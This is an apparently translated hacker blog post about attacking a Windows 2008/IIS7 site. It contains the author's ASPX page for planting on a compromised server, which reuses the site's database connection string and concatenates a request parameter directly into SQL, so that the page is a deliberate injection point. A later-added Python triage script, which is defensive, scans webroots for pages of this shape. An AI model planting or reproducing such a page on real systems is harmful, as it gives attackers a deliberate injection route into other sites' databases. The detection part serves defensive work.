Yesterday 4z1 and I looked at a site. Privilege escalation was really hard; we spent a full five hours on it with no result. 2008 + IIS7, no sa, no root, no services of any kind...
What we did use on it was aspx constructed injection to cross sites. I found a pile of code online, and not one of them worked.
It isn't much code, so I just wrote one myself. So annoying.

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head runat="server">
    <title>暗影aspx构造注射专用页面</title>
</head>
<body>
<form id="form1" runat="server">
<div>
<script language="c#" runat="server">
    // Runs at page initialisation; AutoEventWireup binds Page_Init by name.
    void Page_Init(object sender, EventArgs e)
    {
        System.Data.SqlClient.SqlConnection conn = new System.Data.SqlClient.SqlConnection();
        // Reuses a connection string already defined in the site's web.config;
        // "连接名" is a placeholder for that connection string's name.
        conn.ConnectionString = ConfigurationManager.ConnectionStrings["连接名"].ToString();
        conn.Open();

        string i = this.Page.Request.Params["xxser"]; // the parameter: ?xxser=1

        // "[表]" and "列名" are placeholders for a real table and column;
        // the request parameter is concatenated straight into the SQL text.
        System.Data.SqlClient.SqlCommand command = new System.Data.SqlClient.SqlCommand("select * from [表] where 列名= " + i, conn);
        int x = command.ExecuteNonQuery(); // for a SELECT this returns -1, not a row count
        Response.Write(i + "\n");
        Response.Write(x);
        conn.Close();
    }
</script>
</div>
</form>
</body>
</html>
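A defender-side triage script, added here and not part of the original post: it flags .aspx files under a webroot whose inline server script reads a request parameter, concatenates it into a SqlCommand and reuses the application's configured connection string, which is the shape of the page above. The indicator regexes, the verdict rule and the two sample pages are all constructed assumptions, not a vendor signature.

```python
"""Heuristic triage for dropped ASPX pages that build SQL from a request parameter.
Constructed example; indicators and thresholds are assumptions, not a vendor rule."""
import re
from pathlib import Path

# Each indicator: (name, regex). Chosen to match the pattern of the page above.
INDICATORS = [
    ("inline_server_script", re.compile(r'<script[^>]*runat\s*=\s*"?server"?', re.I)),
    ("reuses_app_connstring", re.compile(r'ConfigurationManager\.ConnectionStrings\[', re.I)),
    ("request_param_read", re.compile(r'Request\.(Params|QueryString|Form)\[|Request\[', re.I)),
    ("sql_from_concat", re.compile(r'new\s+(System\.Data\.SqlClient\.)?SqlCommand\s*\([^;]*"\s*\+', re.I)),
    ("echoes_input", re.compile(r'Response\.Write\s*\(', re.I)),
]

def score_aspx(text: str) -> dict:
    """Return which indicators fire, an overall verdict and a count for one file's text."""
    hits = {name: bool(rx.search(text)) for name, rx in INDICATORS}
    # Core of the pattern: a server-side script block that reads a request value
    # and concatenates it into a SqlCommand. The other two indicators add confidence.
    core = hits["inline_server_script"] and hits["request_param_read"] and hits["sql_from_concat"]
    return {"hits": hits, "suspicious": core, "score": sum(hits.values())}

def scan_webroot(root: str) -> list:
    """Walk a webroot and return (path, result) for every .aspx file judged suspicious."""
    flagged = []
    for p in Path(root).rglob("*.aspx"):
        try:
            text = p.read_text(encoding="utf-8", errors="replace")
        except OSError:
            continue  # unreadable file: skip rather than abort the sweep
        r = score_aspx(text)
        if r["suspicious"]:
            flagged.append((str(p), r))
    return flagged

# Constructed sample with the shape of the page above, reduced to the relevant lines.
SAMPLE_DROPPED = '''<script language="c#" runat="server">
void Page_Init(object sender, EventArgs e) {
  var conn = new System.Data.SqlClient.SqlConnection();
  conn.ConnectionString = ConfigurationManager.ConnectionStrings["app"].ToString();
  string i = this.Page.Request.Params["q"];
  var cmd = new System.Data.SqlClient.SqlCommand("select * from t where c= " + i, conn);
  Response.Write(i);
}
</script>'''

# Constructed sample of a benign code-behind page: no inline SQL building at all.
SAMPLE_BENIGN = ('<%@ Page Language="C#" CodeBehind="Default.aspx.cs" Inherits="App.Default" %>\n'
                 '<html><body><form runat="server"><asp:Label runat="server" /></form></body></html>')

if __name__ == "__main__":
    for name, sample in [("dropped", SAMPLE_DROPPED), ("benign", SAMPLE_BENIGN)]:
        print(name, score_aspx(sample))
```

Run `scan_webroot(r"C:\inetpub\wwwroot")` (path is an example) during incident triage; a hit is a lead to inspect by hand, not proof on its own.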